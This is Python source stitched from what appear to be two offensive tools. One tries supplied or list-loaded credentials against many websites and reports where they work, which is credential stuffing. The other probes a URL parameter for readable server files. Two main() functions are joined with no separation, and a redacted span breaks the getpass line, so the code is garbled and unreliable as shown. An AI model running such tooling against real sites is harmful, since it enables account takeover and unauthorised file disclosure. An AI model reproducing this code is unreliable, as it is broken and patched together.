        if args.cred_format:
            # --format is 2-3 fields from {u,e,p} with single-char separators,
            # e.g. "u:p" or "e|u|p"; separators are taken from positions 1 and 3.
            separators = [
                re.escape(args.cred_format[1]),
                re.escape(args.cred_format[3]) if len(args.cred_format) > 3 else "\n"
            ]
            cred_format = re.match(r"(u|e|p)[^upe](u|e|p)(?:[^upe](u|e|p))?", args.cred_format)
            if not cred_format:
                print("%s Could not parse --format: \"%s\"" % (ERROR, color(args.cred_format, BW)))
                exit()
            # Expand the one-letter field codes to credential-dict keys.
            cred_format = [
                v.replace("e", "email").replace("u", "username").replace("p", "password")
                for v in cred_format.groups() if v is not None
            ]
        with open(args.load_file, "r") as load_list:
            for user in load_list:
                if args.cred_format:
                    # Split the line using the separators derived from --format.
                    match = re.match(
                        r"([^{0}]+){0}([^{1}]+)(?:{1}([^\n]+))?".format(separators[0], separators[1]), user)
                    credentials = dict(zip(cred_format, match.groups()))
                    credentials["password"] = quote(credentials["password"])
                    if ("email" in credentials and not re.match(
                            r"^[A-Za-z0-9._%+-]+@(?:[A-Z"
                            r"a-z0-9-]+\.)+[A-Za-z]{2,12}$", credentials["email"])):
                        print("%s Specified e-mail \"%s\" does not appear "
                              "to be correct. Skipping...\n" % (WARN, color(credentials["email"], BW)))
                        continue
                    # Ensure both identifier keys exist for downstream lookups.
                    if "email" not in credentials:
                        credentials["email"] = None
                    elif "username" not in credentials:
                        credentials["username"] = None
                else:
                    # Default format: "user:pass"; an e-mail-shaped first field
                    # is treated as the email identifier instead of username.
                    user = user.rstrip().split(":", 1)
                    if not user[0]:
                        if args.verbose:
                            print("%s Could not parse credentials: \"%s\"\n" % (WARN, color(user, BW)))
                        continue
                    match = re.match(
                        r"^[A-Za-z0-9._%+-]+@(?:[A-Z"
                        r"a-z0-9-]+\.)+[A-Za-z]{2,12}$", user[0])
                    credentials = {
                        "email": user[0] if match else None,
                        "username": None if match else user[0],
                        "password": quote(user[1])
                    }
                for target in get_targets():
                    login()
    else:
        credentials = {
            "username": args.username,
            "email": args.email,
            "password": quote(args.password)
        }
        for target in get_targets():
            login()

    log.close()

    if not args.verbose:
        print()

    if len(login_sucessful) > 0 or len(login_failed) > 0:
        _ = "%s/%s" % (color(len(login_sucessful), BW),
                       color(len(login_sucessful) + len(login_failed), BW))
        sign = PLUS if len(login_sucessful) > (len(login_failed) + len(login_skipped)) else INFO
        print(
            "%s Succesfully logged in%s."
            % (sign, " with %s credentials on the list." % _
               if args.load_file else "to %s websites." % _), )
        print("%s An overall success rate of %s.\n"
              % (sign, color(
                  "%%%s" % (100 * len(login_sucessful) /
                            (len(login_sucessful) + len(login_failed))), BW)))

    if len(login_sucessful) > 0:
        print("%s The provided credentials worked on the following website%s: "
              "%s\n" % (PLUS, "s" if len(login_sucessful) != 1 else "", ", ".join(login_sucessful)))

    print("%s Finished tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))
def main():
    """
    Initializes and executes the program: tests the supplied credentials
    against every configured site and prints a summary with the success rate.
    """
    # Per-run result buckets (note: "sucessful" spelling kept from original).
    login_sucessful = []
    login_failed = []

    version = check_revision(VERSION)

    print("%s\n\n%s %s (%s)\n" % (
        BANNER % tuple([color(_) for _ in BANNER_PASSWORDS]), NAME, version, URL))

    args = parse_args()

    if args.update:
        update()
        exit()

    if args.list:
        sites = list_sites()
        for _ in sites:
            print("- %s" % _)
        exit()

    if not args.password:
        # NOTE(review): the "******" below is redacted/scrubbed source (likely
        # the prompt tail, e.g. a "% INFO" format argument); this will not
        # parse until the original code is restored.
        args.password = getpass("%s Please enter password:"******"")

    if args.ignore_proxy:
        # Empty handler dict disables any environment-configured proxy.
        proxy_handler = ProxyHandler({})
    elif args.proxy:
        match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+)"
                          r":(?P<port>\d+)", args.proxy, re.I)
        if match:
            if match.group("type").upper() in ("HTTP", "HTTPS"):
                proxy_host = "%s:%s" % (match.group("address"), match.group("port"))
                proxy_handler = ProxyHandler({"http": proxy_host, "https": proxy_host})
            else:
                # SOCKS support is imported lazily; SOCKS is installed globally,
                # so no urllib handler is required.
                from thirdparty.socks import socks
                if match.group("type").upper() == "SOCKS4":
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True)
                elif match.group("type").upper() == "SOCKS5":
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True)
                proxy_handler = None
        else:
            proxy_handler = ProxyHandler()
    else:
        proxy_handler = None

    # One opener with cookie support; the proxy handler is added only if set.
    opener = build_opener(HTTPHandler(), HTTPSHandler(), HTTPCookieProcessor(cookie_handler))
    if proxy_handler:
        opener.add_handler(proxy_handler)
    install_opener(opener)

    # Pick one random User-Agent line from the bundled list.
    with open(USER_AGENTS_FILE, 'r') as ua_file:
        args.user_agent = sample(ua_file.readlines(), 1)[0].strip()

    credentials = {"username": args.username, "email": args.email, "password": args.password}

    sites = list_sites()
    # --only / --exclude filter the site list (mutually exclusive precedence).
    if args.only:
        sites = [site for site in sites if site in args.only]
    elif args.exclude:
        sites = [site for site in sites if site not in args.exclude]

    print("%s Loaded %d %s to test." % (INFO, len(sites), "site" if len(sites) == 1 else "sites"))

    print("%s Starting tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))

    for site in sites:
        _ = populate_site(site, args)
        if not _:
            continue
        target = Website(_, {"verbose": args.verbose})

        # Skip when the site needs an identifier type we don't have.
        if (target.username_or_email == "email" and not args.email or
                target.username_or_email == "username" and not args.username):
            if args.verbose:
                print("%s Skipping \"%s\" since no \"%s\" was specified.\n"
                      % (INFO, color(target.name), color(target.username_or_email)))
            continue

        print("%s Testing \"%s\"" % (TEST, color(target.name, BW)))

        if not target.user_agent:
            target.user_agent = args.user_agent

        if target.perform_login(credentials, cookie_handler):
            login_sucessful.append(target.name)
        else:
            login_failed.append(target.name)

    if not args.verbose:
        print()

    if len(login_sucessful) > 0 or len(login_failed) > 0:
        print("%s Succesfully logged into %s/%s websites."
              % (INFO, color(len(login_sucessful), BW),
                 color(len(login_sucessful) + len(login_failed), BW)))
        print("%s An overall success rate of %s.\n"
              % (INFO, color("%%%s" % (100 * len(login_sucessful) / len(sites)), BW)))

    if len(login_sucessful) > 0:
        print("%s The provided credentials worked on the following website%s: "
              "%s\n" % (PLUS, "s" if len(login_sucessful) != 1 else "", ", ".join(login_sucessful)))

    print("%s Finished tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))
def main():
    """
    Initializes and executes the program.

    Sets up shared state in `kb`, parses options, loads versioned file
    locations and test cases, configures proxy/user-agent handling, probes
    the target's original and invalid responses, and finally runs the file
    search across `args.threads` worker threads.
    """
    global args

    kb.files = []
    kb.found = False
    kb.print_lock = threading.Lock()
    kb.value_lock = threading.Lock()
    kb.versioned_locations = {}

    check_revision()
    print(BANNER)

    args = parse_args()

    if args.update:
        update()
        exit()

    # Parse versions.ini: "[section]" headers followed by one location per line.
    with open("versions.ini") as f:
        section = None
        # NOTE(review): original used f.xreadlines(), which is deprecated in
        # Python 2 and absent in Python 3; direct file iteration is equivalent.
        for line in f:
            line = line.strip()
            if re.match(r"\[.+\]", line):
                section = line.strip("[]")
            elif line:
                if section not in kb.versioned_locations:
                    kb.versioned_locations[section] = []
                kb.versioned_locations[section].append(line)

    cases = get_cases(args) if not args.list_file else load_list(args.list_file)

    if not cases:
        print("[!] No available test cases with the specified attributes.\n"
              "[!] Please verify available options with --list.")
        exit()

    if args.list:
        args.list = args.list.lower()
        _ = ("category", "software", "os")
        if args.list not in _:
            print("[!] Valid values for option '--list' are: %s" % ", ".join(_))
            exit()
        print("[i] Listing available filters for usage with option '--%s':\n" % args.list)
        try:
            for _ in set([_[args.list] for _ in cases]):
                # Quote values containing anything beyond plain alphanumerics.
                print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _)
        except KeyError:
            pass
        finally:
            exit()

    # Proxy configuration: HTTP(S) via a urllib opener, SOCKS via global patch.
    if args.ignore_proxy:
        _ = ProxyHandler({})
        opener = build_opener(_)
        install_opener(opener)
    elif args.proxy:
        match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)",
                          args.proxy, re.I)
        if match:
            if match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS):
                _ = ProxyHandler({match.group("type"): args.proxy})
                opener = build_opener(_)
                install_opener(opener)
            else:
                from thirdparty.socks import socks
                if match.group("type").upper() == PROXY_TYPE.SOCKS4:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4,
                                          match.group("address"),
                                          int(match.group("port")), True)
                elif match.group("type").upper() == PROXY_TYPE.SOCKS5:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5,
                                          match.group("address"),
                                          int(match.group("port")), True)
        else:
            print("[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\").")
            exit()

    if args.random_agent:
        with open(USER_AGENTS_FILE, 'r') as f:
            args.user_agent = random.sample(f.readlines(), 1)[0]

    kb.parsed_target_url = urlsplit(args.url)
    kb.request_params = args.data if args.data else kb.parsed_target_url.query

    # Without an explicit --param, take the first non-empty GET/POST parameter.
    if not args.param:
        match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)", kb.request_params)
        if match:
            args.param = match.group("param")
        else:
            found = False
            for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)",
                                     kb.request_params):
                found = True
                print("[x] Parameter with empty value found ('%s')." % match.group("param"))
            if found:
                print("[!] Please always use non-empty (valid) parameter values.")
            print("[!] No usable GET/POST parameters found.")
            exit()

    if args.os:
        kb.restrict_os = args.os

    print("[i] Starting scan at: %s\n" % time.strftime("%X"))

    print("[i] Checking original response...")
    request_args = prepare_request(None)
    request_args["url"] = args.url
    if args.data:
        request_args["data"] = args.data
    kb.original_response = get_page(**request_args)
    if not kb.original_response:
        print("[!] Something seems to be wrong with connection settings.")
        if not args.verbose:
            print("[i] Please rerun with switch '-v'.")
        exit()

    print("[i] Checking invalid response...")
    request_args = prepare_request("%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix))
    kb.invalid_response = get_page(**request_args)

    print("[i] Done!")
    print("[i] Searching for files...")

    if args.threads > 1:
        print("[i] Starting %d threads." % args.threads)

    threads = []
    for i in xrange(args.threads):
        # Each worker gets an interleaved slice of the test cases.
        thread = threading.Thread(target=try_cases,
                                  args=([cases[_] for _ in xrange(i, len(cases), args.threads)],))
        thread.daemon = True
        thread.start()
        threads.append(thread)

    # Poll daemon workers until all have finished.
    alive = True
    while alive:
        alive = False
        for thread in threads:
            if thread.isAlive():
                alive = True
                time.sleep(0.1)

    if not kb.found:
        print("[i] No files found!")
    elif args.verbose:
        print("\n[i] Files found:")
        for _ in kb.files:
            print("[o] %s" % _)
        print(" \n[i] File search complete.")

    print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))